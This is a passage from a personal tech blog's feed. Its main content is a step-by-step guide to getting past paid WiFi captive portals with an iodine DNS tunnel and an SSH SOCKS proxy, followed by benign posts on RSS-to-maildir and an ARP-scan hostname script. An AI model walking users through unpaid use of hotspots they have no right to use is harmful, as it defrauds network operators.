SSH to this device with the default credentials (user: pi, pass: raspberry): ssh pi@192.168.7.2 What next? Now that we have the basics figured out, in the next version we will hack the hardware to make the device include a USB-port so it is truly portable. In the rest of the series we will start building our universal hacking/debugging tool so we can connect to it over WiFi and use its emulation capabilities to demonstrate physical attack-vectors. You can find the next one here: HackOTG (v1.1): Integrating the cable for more portabilityHack: Get free WiFi on paid-access hotspots with a DNS tunnel2017-10-03T00:00:00+00:002017-10-03T00:00:00+00:00https://lvlrt.github.io/2017/10/03/hack-get-free-wifi-on-paid-access-hotspots<p><img src="/assets/dns-tunnel-monitoring.png" alt="header" /></p>
<p>Everybody knows that you can’t connect to a WiFi-hotspot if it is secured and you don’t have a the password. But at airports, train-stations or homes with a routers from a big provider you will have a unsecured wifi hotspot, but when you connect to it and you open your browser, you will get prompted to log in or supply a credit card, etc… . Great if you have a login but otherwise you are stuck behind this <a href="https://en.wikipedia.org/wiki/Captive_portal">‘captive’ portal</a> (that is what this page is called).</p>
<h2>How to bypass a captive portal</h2>
<p>Often you can bypass a captive portal page by using DNS tunneling. You can test if this attack is possible by trying to ping google.com. Try this command;</p>
<pre>ping www.google.com</pre>
<pre class="output">[root@localhost ~]# ping www.google.com
PING www.google.com (172.217.17.36) 56(84) bytes of data.</pre>
<p>You don’t need to get a PING back, but you can see that www.google.com resolved to 172.217.17.36, this means that DNS is still working… strange if you don’t have an internet connection right?</p>
<p>So this means that <a href="https://nl.wikipedia.org/wiki/Domain_Name_System">DNS</a> is still working. If we give the router a domain, it will resolve it by sending it to a nameserver and it will keep searching till if finds the IP, which it will send back to us. Now if you specify a <a href="https://en.wikipedia.org/wiki/Subdomain">subdomain</a> (“mail” in mail.google.com) it will ask the nameserver of the subdomain (if it exists) to give the right IP and relay it back.</p>
<p>This means that if we control the subdomain we are looking up, and we control the nameserver assosiated with it, we can decide which IP (or <a href="https://en.wikipedia.org/wiki/List_of_DNS_record_types">better DNS record</a>) to send back. The result is that we can upload data through an extra attached subdomain and download data encoded in the DNS-record that is send back. This process is called DNS-tunneling. To encode this data, there are multiple tools available but <a href="http://code.kryo.se/iodine/">iodine</a> is a great one, and this is that is used in this article.</p>
<h2>What you need to setup:</h2>
<ul>
<li>Spare (Linux) machine at home, this can be an existing server or desktop.</li>
<li><a href="https://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a> that resolves to public IP of server (explained in this article)</li>
<li>A subdomain that holds a NAMESERVER-record (explained in this article)</li>
<li><a href="http://code.kryo.se/iodine/">Iodine</a>-daemon on the server (explained in this article)</li>
<li>Router which you can setup with static IP’s and <a href="https://en.wikipedia.org/wiki/Port_forwarding">Port forwarding</a></li>
</ul>
<h2>Setting up the DDNS and NS-record</h2>
<p>You can use <a href="https://freedns.afraid.org/">freedns.afraid.org</a> for the <a href="https://en.wikipedia.org/wiki/Dynamic_DNS">dynamic DNS</a> and the <a href="https://en.wikipedia.org/wiki/List_of_DNS_record_types#NS">NS-record</a>. So make an account and go to “subdomains”. You need to make 2 subdomains. One is a normal A-record (domain name to IP) and one of the type NS that is redirected to the A-record so it points to the public IP of the server at home.</p>
<p><img src="/assets/iodine1.png" alt="setup ddns on site" /></p>
<p>For the A-record fill in a sub domain (can be anything, just remember it) and choose a domain (these are donated by a large community to use). fill in the captcha and done.</p>
<p>The NS-record do the same, but change the destination to the A-record you just made (<subdomain>.<domain>).</domain></subdomain></p>
<p>The IP of the A-record was auto-filled when the subdomain was created but it needs to be periodicly updated by the server, so it keeps pointing at the public IP of you home-router with the server behind it. There are many ways to do this (<a href="https://freedns.afraid.org/scripts/freedns.clients.php">can be found here</a>), but one of the easiest is fetching an url with a curl-command every 60 seconds.If you go to <a href="https://freedns.afraid.org/dynamic/">freedns.afraid.org/dynamic</a>, you can choose your subdomain of your A-record and get the link behind ‘direct link’.</p>
<p><img src="/assets/iodine2.png" alt="extra setup" /></p>
<p>It looks like this:</p>
<pre>https://freedns.afraid.org/dynamic/update.php?<your-key></pre>
<p><strong>ddns.sh:</strong></p>
<pre class="output">while true
do
curl https://freedns.afraid.org/dynamic/update.php?<your-key>
sleep 60
done</pre>
<p>Put this on the server at home. This is a script that calls the url every 60 seconds so it keeps updated over time. You probably want to execute it on boot. On a system with systemd you can use this service file:</p>
<p><strong>/usr/lib/systemd/system/ddns.service:</strong></p>
<pre class="output">[Unit]
After=network.target
Requires=network.target
[Service]
ExecStart=/usr/bin/sh /root/ddns.sh
[Install]
WantedBy=multi-user.target</pre>
<p>Then run these commands to check if it works and if so, make it persistent.</p>
<pre>sudo systemctl start ddns.service</pre>
<p>sudo systemctl status ddns.service #check if ok sudo systemctl enable ddns.service #make it persistant over boot</p>
<p>Now if you ping your A-record subdomain you will get the IP of your router at home. The ddns.service will keep it that way.</p>
<h2>Configuring the Iodine-daemon</h2>
<p>First you have to install the iodine program on the server at home, find it in the repository as “iodine” or “iodine-server”. For Arch-Linux this is the following command:</p>
<pre>pacman -Sy iodine</pre>
<p>Now you want to configure the daemon with the info of your record and make it start at boot. This is the command that has to run on boot:</p>
<pre>/usr/bin/iodined -f -c -l $IODINE_BIND_ADDRESS -n $IODINE_EXT_IP -p $IODINE_PORT -P $IODINE_PASSWORD -u $IODINE_USER $TUN_IP $TOP_DOMAIN</pre>
<p>On Arch-Linux the service file is already supplied and the settings can be found at <strong>/etc/conf.d/iodined</strong>:<strong> </strong>(you only need TOP_DOMAIN and IODINE_PASSWORD)</p>
<pre class="output"># Address and subnet to use for the tunnel (default mask is /27)
TUN_IP="172.18.42.1/24"
# Password (32 characters max)
IODINE_PASSWORD="mypassword"
# The domain you control, see documentation.
TOP_DOMAIN="<subdomain>.<domain>.com"
# UDP port iodined should listen on.
IODINE_PORT="53"
# Local IP address iodined should bind to.
IODINE_BIND_ADDRESS="0.0.0.0"
# External IP of your iodined server, used in DNS answers.
IODINE_EXT_IP=""
# The user iodined should run as.
IODINE_USER="nobody"</pre>
<p>When ready run these commands to make it run at boot on an Arch-Linux system:</p>
<pre>sudo systemctl start iodined.service
sudo systemctl status iodined.service
sudo systemctl enable iodined.service</pre>
<p><em>Note: You really want to set a password, this is not for encryption, this is not encrypted in any way, but for authentication, so not everybody can use your DNS-tunnel. </em></p>
<p>Now you need to port-forward port 53 (the port DNS uses) on your home-router to your device, used as server. This is different for every router but generally you also want to make the internal IP “static” for this device so it does not change after a reboot. Now your Iodine-daemon is accessible from outside of your network.</p>
<p>You can check if everything is properly setup by filling it in on this page <a href="http://code.kryo.se/iodine/check-it/">http://code.kryo.se/iodine/check-it/</a>. It will tell you were it failed if something is not in order. If it works, let’s bypass some captive portals!</p>
<h2>Usage</h2>
<p>You should install the <a href="http://code.kryo.se/iodine/">iodine</a>-client before you get stuck somewhere without internet.</p>
<p>It is found in many repositories as “iodine” or “iodine-client”. On Arch-Linux:</p>
<pre>pacman -Sy iodine</pre>
<p>Then to use this technique when you are behind a captive portal, make sure you are connected to the hotspot. Then, when you have confirmed there is a hole in the security of the captive portal with the ping method described in the first part of this article, run the following command. (it will ask a password if set)</p>
<pre>iodine <subdomain>.<domain></pre>
<pre class="output">Enter password:
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for ****.****.*** to 192.168.1.1
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 172.18.42.2
Setting MTU of dns0 to 1130
Server tunnel IP is 172.18.42.1
Testing raw UDP data to the server (skip with -r)
Server is at 192.168.1.2, trying raw login: OK
Sending raw traffic directly to 192.168.1.2
Connection setup complete, transmitting data.
Detaching from terminal...</pre>
<p>Awesome! We have a tunnel. Now we can contact every port on the server at 172.18.42.1, for example we can SSH to the server:</p>
<pre>ssh user@172.18.42.1</pre>
<p>Now to tunnel a internet connection through, you can use the built in SOCKS-proxy of SSH. To use it supply the -D option with a local port to put the proxy on. All your internet will be tunneled over the ssh-connection if you specify the proxy in your program. example of the command:</p>
<pre>ssh user@172.18.42.1 -D 5000</pre>
<p>Research how to setup your programs on your system to use the proxy or use this quick tip which explains how to <a href="https://larsveelaert.github.io/2017/02/02/running-a-terminal-command-through-a-proxy/">run commands through a proxy</a>.
There is also a transparent way that tunnels all internet through a ssh tunnel <a href="https://larsveelaert.github.io/2017/02/17/poor-man-vpn/">explained here</a>.</p>
<p>Hope you learned something about how the internet works and have some free internet in the meanwhile. Have fun!</p>Lars VeelaertEverybody knows that you can’t connect to a WiFi-hotspot if it is secured and you don’t have a the password. But at airports, train-stations or homes with a routers from a big provider you will have a unsecured wifi hotspot, but when you connect to it and you open your browser, you will get prompted to log in or supply a credit card, etc… . Great if you have a login but otherwise you are stuck behind this ‘captive’ portal (that is what this page is called). How to bypass a captive portal Often you can bypass a captive portal page by using DNS tunneling. You can test if this attack is possible by trying to ping google.com. Try this command; ping www.google.com [root@localhost ~]# ping www.google.com PING www.google.com (172.217.17.36) 56(84) bytes of data. You don’t need to get a PING back, but you can see that www.google.com resolved to 172.217.17.36, this means that DNS is still working… strange if you don’t have an internet connection right? So this means that DNS is still working. If we give the router a domain, it will resolve it by sending it to a nameserver and it will keep searching till if finds the IP, which it will send back to us. Now if you specify a subdomain (“mail” in mail.google.com) it will ask the nameserver of the subdomain (if it exists) to give the right IP and relay it back. This means that if we control the subdomain we are looking up, and we control the nameserver assosiated with it, we can decide which IP (or better DNS record) to send back. The result is that we can upload data through an extra attached subdomain and download data encoded in the DNS-record that is send back. This process is called DNS-tunneling. To encode this data, there are multiple tools available but iodine is a great one, and this is that is used in this article. What you need to setup: Spare (Linux) machine at home, this can be an existing server or desktop. Dynamic DNS that resolves to public IP of server (explained in this article) A subdomain that holds a NAMESERVER-record (explained in this article) Iodine-daemon on the server (explained in this article) Router which you can setup with static IP’s and Port forwarding Setting up the DDNS and NS-record You can use freedns.afraid.org for the dynamic DNS and the NS-record. So make an account and go to “subdomains”. You need to make 2 subdomains. One is a normal A-record (domain name to IP) and one of the type NS that is redirected to the A-record so it points to the public IP of the server at home. For the A-record fill in a sub domain (can be anything, just remember it) and choose a domain (these are donated by a large community to use). fill in the captcha and done. The NS-record do the same, but change the destination to the A-record you just made (.). The IP of the A-record was auto-filled when the subdomain was created but it needs to be periodicly updated by the server, so it keeps pointing at the public IP of you home-router with the server behind it. There are many ways to do this (can be found here), but one of the easiest is fetching an url with a curl-command every 60 seconds.If you go to freedns.afraid.org/dynamic, you can choose your subdomain of your A-record and get the link behind ‘direct link’. It looks like this: https://freedns.afraid.org/dynamic/update.php?<your-key> ddns.sh: while true do curl https://freedns.afraid.org/dynamic/update.php?<your-key> sleep 60 done Put this on the server at home. This is a script that calls the url every 60 seconds so it keeps updated over time. You probably want to execute it on boot. On a system with systemd you can use this service file: /usr/lib/systemd/system/ddns.service: [Unit] After=network.target Requires=network.target [Service] ExecStart=/usr/bin/sh /root/ddns.sh [Install] WantedBy=multi-user.target Then run these commands to check if it works and if so, make it persistent. sudo systemctl start ddns.service sudo systemctl status ddns.service #check if ok sudo systemctl enable ddns.service #make it persistant over boot Now if you ping your A-record subdomain you will get the IP of your router at home. The ddns.service will keep it that way. Configuring the Iodine-daemon First you have to install the iodine program on the server at home, find it in the repository as “iodine” or “iodine-server”. For Arch-Linux this is the following command: pacman -Sy iodine Now you want to configure the daemon with the info of your record and make it start at boot. This is the command that has to run on boot: /usr/bin/iodined -f -c -l $IODINE_BIND_ADDRESS -n $IODINE_EXT_IP -p $IODINE_PORT -P $IODINE_PASSWORD -u $IODINE_USER $TUN_IP $TOP_DOMAIN On Arch-Linux the service file is already supplied and the settings can be found at /etc/conf.d/iodined: (you only need TOP_DOMAIN and IODINE_PASSWORD) # Address and subnet to use for the tunnel (default mask is /27) TUN_IP="172.18.42.1/24" # Password (32 characters max) IODINE_PASSWORD="mypassword" # The domain you control, see documentation. TOP_DOMAIN="<subdomain>.<domain>.com" # UDP port iodined should listen on. IODINE_PORT="53" # Local IP address iodined should bind to. IODINE_BIND_ADDRESS="0.0.0.0" # External IP of your iodined server, used in DNS answers. IODINE_EXT_IP="" # The user iodined should run as. IODINE_USER="nobody" When ready run these commands to make it run at boot on an Arch-Linux system: sudo systemctl start iodined.service sudo systemctl status iodined.service sudo systemctl enable iodined.service Note: You really want to set a password, this is not for encryption, this is not encrypted in any way, but for authentication, so not everybody can use your DNS-tunnel. Now you need to port-forward port 53 (the port DNS uses) on your home-router to your device, used as server. This is different for every router but generally you also want to make the internal IP “static” for this device so it does not change after a reboot. Now your Iodine-daemon is accessible from outside of your network. You can check if everything is properly setup by filling it in on this page http://code.kryo.se/iodine/check-it/. It will tell you were it failed if something is not in order. If it works, let’s bypass some captive portals! Usage You should install the iodine-client before you get stuck somewhere without internet. It is found in many repositories as “iodine” or “iodine-client”. On Arch-Linux: pacman -Sy iodine Then to use this technique when you are behind a captive portal, make sure you are connected to the hotspot. Then, when you have confirmed there is a hole in the security of the captive portal with the ping method described in the first part of this article, run the following command. (it will ask a password if set) iodine <subdomain>.<domain> Enter password: Opened dns0 Opened IPv4 UDP socket Sending DNS queries for ****.****.*** to 192.168.1.1 Autodetecting DNS query type (use -T to override). Using DNS type NULL queries Version ok, both using protocol v 0x00000502. You are user #0 Setting IP of dns0 to 172.18.42.2 Setting MTU of dns0 to 1130 Server tunnel IP is 172.18.42.1 Testing raw UDP data to the server (skip with -r) Server is at 192.168.1.2, trying raw login: OK Sending raw traffic directly to 192.168.1.2 Connection setup complete, transmitting data. Detaching from terminal... Awesome! We have a tunnel. Now we can contact every port on the server at 172.18.42.1, for example we can SSH to the server: ssh user@172.18.42.1 Now to tunnel a internet connection through, you can use the built in SOCKS-proxy of SSH. To use it supply the -D option with a local port to put the proxy on. All your internet will be tunneled over the ssh-connection if you specify the proxy in your program. example of the command: ssh user@172.18.42.1 -D 5000 Research how to setup your programs on your system to use the proxy or use this quick tip which explains how to run commands through a proxy. There is also a transparent way that tunnels all internet through a ssh tunnel explained here. Hope you learned something about how the internet works and have some free internet in the meanwhile. Have fun!Receive all your web updates in your mailbox with rss2email2017-09-29T00:00:00+00:002017-09-29T00:00:00+00:00https://lvlrt.github.io/2017/09/29/get-all-your-updates-in-your-mailbox-with-rss<p><img src="/assets/rss.jpg" alt="header rss article" /></p>
<p>So I have a couple sites I check regularly… YouTube, a couple blogs, Reddit-pages, LinkedIn and some news-sites. Often it happens that I miss some interesting article, or in general, I have to remember to check it. It’s not very productive to have the feeling you have to check everything, all the time.</p>
<p>A good way to go about this is subscribing to newsletters and reviewing settings of your online accounts to have messages send to your mail inbox. Great, but not every simple site has this option and newsletters often are to bloated with ads and calls to action to be fun to read.</p>
<p>I’ve wanted to solve this problem for quite a while but never found a good solution. My general philosophy is having everything on every device working in exactly the same way. I make sure I get a terminal on every device and from there I open my Linux environment with all my tools setup and synced.</p>
<h2>And then I discovered RSS</h2>
<p>Most sites today offer a RSS-feed. This is a file that resides somewhere on the domain (often linked somewhere on the homepage) and is a very simple XML file that has a summary of the meaningful changes to a site. Most engines like WordPress and Joomla have it by default. And any major site will support it (I havent found one that does not). Sometimes a Google-search is needed to find the right URL for sites like Reddit, but it’s (nearly) always there.</p>
<h2>The problem</h2>
<p>So if you have all your links of RSS-feeds, you can put them in a program that handles all the news for you.
In the early days there was <a href="https://www.google.com/reader/about/">Google Reader</a> but that is gone right now (it did not fit the Google marketing anymore).
There are apps like <a href="https://feedly.com/">Feedly</a> to replace it and many <a href="https://www.howtogeek.com/128487/the-best-free-rss-readers-for-keeping-up-with-your-favorite-websites/">others</a>.</p>
<p>These are definitely great, but I don’t like standalone programs. I’d like my news to end up in my mailbox. I tried online RSS to Email converters like <a href="https://blogtrottr.com/">Blogtrottr</a> but never really liked it. It failed often and I had to go online and log in to add extra feeds. I also like to use as few resources or services as possible.</p>
<p>Then local converters such as <a href="https://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwiBm8yikMrWAhWBCBoKHfDdDi0QFggwMAE&url=http%3A%2F%2Fnewspipe.sourceforge.net%2F&usg=AFQjCNEANFszQVtDJDB4BQN6CgfnLXsc4w">newspipe</a> and <a href="http://www.allthingsrss.com/rss2email/">rss2email</a> got my attention but they are the main page was down and rss2email needed a specific format to read the links from and would write my mails into an incompatible and older version of mailbox.</p>
<h2>The DIY fix</h2>
<p>So I realized <a href="http://www.allthingsrss.com/rss2email/">rss2email</a> was written in Python (Yes!) and most of its heavy-lifting was done by a module called “feedparser”. So I wrote my own script to take a list of URL’s (of rss-feeds) and add them my local inbox in Maildir-format (I use the terminal application <a href="https://nl.wikipedia.org/wiki/Mutt">mutt</a> for my email). Many email-programs use this standardized format so research if yours is compatible. If you want to read a great article on how to set up Mutt I recommend <a href="https://wiki.archlinux.org/index.php/mutt">this Arch Linux post</a> and <a href="http://stevelosh.com/blog/2012/10/the-homely-mutt/">The Homely Mutt</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
41 N Jan 03 RecentQuestions (2.4K) [SE TOR] Clearing the client side DNS cache provides privacy improvement?
42 N Jan 03 RecentQuestions (0.8K) [SE TOR] How to make VPN like Tor faster ? or is there any VPN like Tor but faster?
43 N Jan 03 RecentQuestions (3.2K) [SE TOR] Clearing the state of rendezvous client provides privacy improvement?
44 N Jan 03 LinusTechTips (1.6K) [LTT] 5 Gadgets to help you Wake-Up
45 N Jan 03 BryanLunduke (0.7K) [YT BRYAN LUNDUKE] Weekly Tech News - Jan 3rd, 2018
46 N Jan 03 reddit.be (0.7K) [REDDIT BELGIUM] Wat de Nederlandse oud-premier Dries van Agt (1977-1982) vanavond op
47 N Jan 03 Crypt0 (2.8K) [CRYPTO] Ripple: The New World Order Coin? / BTC's Birthday! / Intel's BIG Mistake /
48 N Jan 03 VICENews (1.9K) [VICE NEWS] The Darkest Place In America & Marines In Afghanistan: VICE News Tonight
49 N Jan 04 VICENews (2.2K) [VICE NEWS] Scientists Can Now Quickly Link Extreme Weather Events To Climate Change
50 N Jan 04 VICENews (1.7K) [VICE NEWS] The Making Of Bhad Bhabie (HBO)
...
</code></pre></div></div>
<p>So this is the command you can add to a macro or <a href="https://demgeeks.com/qt-make-the-command-line-easier-with-aliases-and-functions/">alias</a> to fetch the feeds form the <em>rss.txt</em> file in the <em>~/RSS/</em> directory and parse them offline into emails which will be added to the <em>~/MAILDIR/account/INBOX</em></p>
<pre>python ~/rss2maildir.py ~/RSS ~/MAILDIR/account/INBOX</pre>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
0 found!
checking: http://www.reddit.com/r/belgium/.rss
0 found!
checking: https://tor.stackexchange.com/feeds
0 found!
checking: https://security.stackexchange.com/feeds
...
</code></pre></div></div>
<p>You can find the script and an example rss.txt in <a href="https://github.com/polarsbear/rss2maildir">this Github-repo</a>. Feel free to give tips and share your experiences!</p>Lars VeelaertSo I have a couple sites I check regularly… YouTube, a couple blogs, Reddit-pages, LinkedIn and some news-sites. Often it happens that I miss some interesting article, or in general, I have to remember to check it. It’s not very productive to have the feeling you have to check everything, all the time. A good way to go about this is subscribing to newsletters and reviewing settings of your online accounts to have messages send to your mail inbox. Great, but not every simple site has this option and newsletters often are to bloated with ads and calls to action to be fun to read. I’ve wanted to solve this problem for quite a while but never found a good solution. My general philosophy is having everything on every device working in exactly the same way. I make sure I get a terminal on every device and from there I open my Linux environment with all my tools setup and synced. And then I discovered RSS Most sites today offer a RSS-feed. This is a file that resides somewhere on the domain (often linked somewhere on the homepage) and is a very simple XML file that has a summary of the meaningful changes to a site. Most engines like WordPress and Joomla have it by default. And any major site will support it (I havent found one that does not). Sometimes a Google-search is needed to find the right URL for sites like Reddit, but it’s (nearly) always there. The problem So if you have all your links of RSS-feeds, you can put them in a program that handles all the news for you. In the early days there was Google Reader but that is gone right now (it did not fit the Google marketing anymore). There are apps like Feedly to replace it and many others. These are definitely great, but I don’t like standalone programs. I’d like my news to end up in my mailbox. I tried online RSS to Email converters like Blogtrottr but never really liked it. It failed often and I had to go online and log in to add extra feeds. I also like to use as few resources or services as possible. Then local converters such as newspipe and rss2email got my attention but they are the main page was down and rss2email needed a specific format to read the links from and would write my mails into an incompatible and older version of mailbox. The DIY fix So I realized rss2email was written in Python (Yes!) and most of its heavy-lifting was done by a module called “feedparser”. So I wrote my own script to take a list of URL’s (of rss-feeds) and add them my local inbox in Maildir-format (I use the terminal application mutt for my email). Many email-programs use this standardized format so research if yours is compatible. If you want to read a great article on how to set up Mutt I recommend this Arch Linux post and The Homely Mutt. ... 41 N Jan 03 RecentQuestions (2.4K) [SE TOR] Clearing the client side DNS cache provides privacy improvement? 42 N Jan 03 RecentQuestions (0.8K) [SE TOR] How to make VPN like Tor faster ? or is there any VPN like Tor but faster? 43 N Jan 03 RecentQuestions (3.2K) [SE TOR] Clearing the state of rendezvous client provides privacy improvement? 44 N Jan 03 LinusTechTips (1.6K) [LTT] 5 Gadgets to help you Wake-Up 45 N Jan 03 BryanLunduke (0.7K) [YT BRYAN LUNDUKE] Weekly Tech News - Jan 3rd, 2018 46 N Jan 03 reddit.be (0.7K) [REDDIT BELGIUM] Wat de Nederlandse oud-premier Dries van Agt (1977-1982) vanavond op 47 N Jan 03 Crypt0 (2.8K) [CRYPTO] Ripple: The New World Order Coin? / BTC's Birthday! / Intel's BIG Mistake / 48 N Jan 03 VICENews (1.9K) [VICE NEWS] The Darkest Place In America & Marines In Afghanistan: VICE News Tonight 49 N Jan 04 VICENews (2.2K) [VICE NEWS] Scientists Can Now Quickly Link Extreme Weather Events To Climate Change 50 N Jan 04 VICENews (1.7K) [VICE NEWS] The Making Of Bhad Bhabie (HBO) ... So this is the command you can add to a macro or alias to fetch the feeds form the rss.txt file in the ~/RSS/ directory and parse them offline into emails which will be added to the ~/MAILDIR/account/INBOX python ~/rss2maildir.py ~/RSS ~/MAILDIR/account/INBOX ... 0 found! checking: http://www.reddit.com/r/belgium/.rss 0 found! checking: https://tor.stackexchange.com/feeds 0 found! checking: https://security.stackexchange.com/feeds ... You can find the script and an example rss.txt in this Github-repo. Feel free to give tips and share your experiences!ARP-A-HOST, a script to resolve local network hostnames without extra services2017-09-27T00:00:00+00:002017-09-27T00:00:00+00:00https://lvlrt.github.io/2017/09/27/resolve-local-network-hostnames<p>I was in desperate need to find a way to not always have to scan the network or go over to another device to know its IP so I could ssh into it or use a service it was serving. This is what I found.</p>
<p>The internet is just a lot of devices, which can be addressed with an <a href="https://en.wikipedia.org/wiki/IP_address">IP address</a>. Those are unique in every network. To make the network more usable we use <a href="https://en.wikipedia.org/wiki/Domain_name">domain names</a> with logical, easy to remember names like www.google.com or www.facebook.com.</p>
<p>This works by contactin a server with a fixed IP which provides <a href="https://nl.wikipedia.org/wiki/Domain_Name_System">DNS</a> that resolves your domain name in an IP that your browser can go to. DNS-servers for the global internet are managed by governments and maintained by big companies like Google. This is why, If you want a domain name, it comes with a fee…</p>
<p>On local networks, its overkill (and quite some setup) to have a <a href="https://www.lifewire.com/what-is-a-dns-server-2625854">DNS-server</a> to resolve the IP of devices but other programs like <a href="https://nl.wikipedia.org/wiki/Zeroconf">zeroconf</a> and <a href="https://en.wikipedia.org/wiki/Multicast_DNS">mdns</a> tried to have a more low-maintenance take on this problem. Short story: Still not ideal. You still have to have services running on all devices to ensure that your device gets registered…</p>
<h2>The solution</h2>
<p>The ideal solution consists of:</p>
<p>– No changes needed to the network (so it works everywhere)</p>
<p>– Reliable</p>
<p>– Very little setup on the device itself and no services need to be running</p>
<p>– Cross-platform</p>
<p>The idea is to maintain a list of <a href="https://en.wikipedia.org/wiki/MAC_address">MAC-addresses</a> of the devices I use (and sync those with <a href="https://www.dropbox.com/">Dropbox</a> or <a href="https://git-scm.com/">Git</a>), scan the network for these <a href="https://en.wikipedia.org/wiki/MAC_address">MAC-addresses</a> and if found, add them to the /etc/hosts file. This is reliable because MAC-addresses are hard-coded in your hardware. You only need to know the MAC of your other devices and you can identify it. Every device has to have one. Adding to the /etc/hosts file is something that is supported by the core of linux so it is quite cross-platform on any device you can get linux working on.</p>
<p>So whenever my network-setup changes, or it has been a while and adresses may have switched, I run the following command;</p>
<pre>bash ./ARP-A-HOST.sh ./HOSTS_MACS</pre>
<p><strong>ARP-A-HOST.sh script:</strong></p>
<pre>#DEPENDENCIES: arp-scan
#take $1 (first argument of the script) -> file with mac adresses + hostname
tmpfile=$(mktemp /tmp/DYNAMIC-RESOLVE.XXXXXX) #tmp file for temporary results
#clear lines form the previous run in /etc/hosts file
sed -i.bak '/DYNAMIC_RESOLVE/d' /etc/hosts
#use the tool arp-scan to find all the devices on the network
if ! [ -z $2 ]; then
arp-scan -l --localnet --interface=$2 >> $tmpfile
else
for line in $(ip link | cut -d " " -f 2); do
interface=${line::-1}
arp-scan -l --localnet --interface=$interface 2>/dev/null >> $tmpfile
done
#TODO interfaceoption -> default wlan
fi
echo Arpscan Finished... Filtering results...
#reading the results one by one
while read -r line
do
MAC=$(echo $line | cut -d " " -f 1)
NAME=$(echo $line | cut -d " " -f 2)
#grep MAC from ARP cache
IP=$(cat $tmpfile | grep $MAC | cut -d$'\t' -f 1)
if ! [ -z "${IP}" ]; then
echo Found $NAME at $IP! Adding to /etc/hosts...
echo "$IP $NAME $NAME #DYNAMIC_RESOLVE">>/etc/hosts #If the MAC is found, add to the /etc/hosts file
fi
done < "$1"
echo Done with discovering hosts</pre>
<p><strong>HOSTS_MACS file:</strong></p>
<pre>00:90:f5:d6:5b:05 c1
c0:ee:fb:59:fc:23 s1
10:02:b5:d6:08:8a o1
b8:27:eb:4e:0c:42 kh1</pre>
<p>The second file is just a list of MAC-addresses with a name you chose behind it. You can find your MAC-address in various ways, but the easiest is just running the ifconfig command on linux. (look next to “ether”)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost]# ifconfig
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.13 netmask 255.255.255.0 broadcast 192.168.1.255
ether 10:02:b5:d6:08:8a txqueuelen 1000 (Ethernet)
RX packets 221361 bytes 303819415 (289.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 112644 bytes 15169217 (14.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...
</code></pre></div></div>
<p>You will need the tool arp-scan to run this script, you can find it in nearly all repositories. I run this script on an android phone, a desktop, chromebook and Raspberry Pi. So no worries.</p>
<p>If you check the /etc/hosts file you can see the following has changed:</p>
<pre>#
# /etc/hosts: static lookup table for host names
#
#<ip-address> <hostname.domain.org> <hostname>
127.0.0.1 localhost.localdomain localhost
::1 localhost.localdomain localhost
# End of file
192.168.1.3 s1 s1 #DYNAMIC_RESOLVE
192.168.1.2 kh1 kh1 #DYNAMIC_RESOLVE</pre>
<p>You can now use the hostnames in most commands and have them automatically resolved;</p>
<pre>ssh s1 #resolves to the IP adress of my phone
ssh root@kh1 -p 22 #same but with more arguments</pre>
<p>You can alias the <em>ARP-A-HOST.sh</em>-script command in you bashrc](https://demgeeks.com/qt-make-the-command-line-easier-with-aliases-and-functions/) to make it easier to use. There is also <a href="https://github.com/larsveelaert/ARP-A-HOST">a Github-repo</a> that contains all the files needed.</p>
<p>That’s it! have fun!</p>Lars VeelaertI was in desperate need to find a way to not always have to scan the network or go over to another device to know its IP so I could ssh into it or use a service it was serving. This is what I found. The internet is just a lot of devices, which can be addressed with an IP address. Those are unique in every network. To make the network more usable we use domain names with logical, easy to remember names like www.google.com or www.facebook.com. This works by contactin a server with a fixed IP which provides DNS that resolves your domain name in an IP that your browser can go to. DNS-servers for the global internet are managed by governments and maintained by big companies like Google. This is why, If you want a domain name, it comes with a fee… On local networks, its overkill (and quite some setup) to have a DNS-server to resolve the IP of devices but other programs like zeroconf and mdns tried to have a more low-maintenance take on this problem. Short story: Still not ideal. You still have to have services running on all devices to ensure that your device gets registered… The solution The ideal solution consists of: – No changes needed to the network (so it works everywhere) – Reliable – Very little setup on the device itself and no services need to be running – Cross-platform The idea is to maintain a list of MAC-addresses of the devices I use (and sync those with Dropbox or Git), scan the network for these MAC-addresses and if found, add them to the /etc/hosts file. This is reliable because MAC-addresses are hard-coded in your hardware. You only need to know the MAC of your other devices and you can identify it. Every device has to have one. Adding to the /etc/hosts file is something that is supported by the core of linux so it is quite cross-platform on any device you can get linux working on. So whenever my network-setup changes, or it has been a while and adresses may have switched, I run the following command; bash ./ARP-A-HOST.sh ./HOSTS_MACS ARP-A-HOST.sh script: #DEPENDENCIES: arp-scan #take $1 (first argument of the script) -> file with mac adresses + hostname tmpfile=$(mktemp /tmp/DYNAMIC-RESOLVE.XXXXXX) #tmp file for temporary results #clear lines form the previous run in /etc/hosts file sed -i.bak '/DYNAMIC_RESOLVE/d' /etc/hosts #use the tool arp-scan to find all the devices on the network if ! [ -z $2 ]; then arp-scan -l --localnet --interface=$2 >> $tmpfile else for line in $(ip link | cut -d " " -f 2); do interface=${line::-1} arp-scan -l --localnet --interface=$interface 2>/dev/null >> $tmpfile done #TODO interfaceoption -> default wlan fi echo Arpscan Finished... Filtering results... #reading the results one by one while read -r line do MAC=$(echo $line | cut -d " " -f 1) NAME=$(echo $line | cut -d " " -f 2) #grep MAC from ARP cache IP=$(cat $tmpfile | grep $MAC | cut -d$'\t' -f 1) if ! [ -z "${IP}" ]; then echo Found $NAME at $IP! Adding to /etc/hosts... echo "$IP $NAME $NAME #DYNAMIC_RESOLVE">>/etc/hosts #If the MAC is found, add to the /etc/hosts file fi done < "$1" echo Done with discovering hosts HOSTS_MACS file: 00:90:f5:d6:5b:05 c1 c0:ee:fb:59:fc:23 s1 10:02:b5:d6:08:8a o1 b8:27:eb:4e:0c:42 kh1 The second file is just a list of MAC-addresses with a 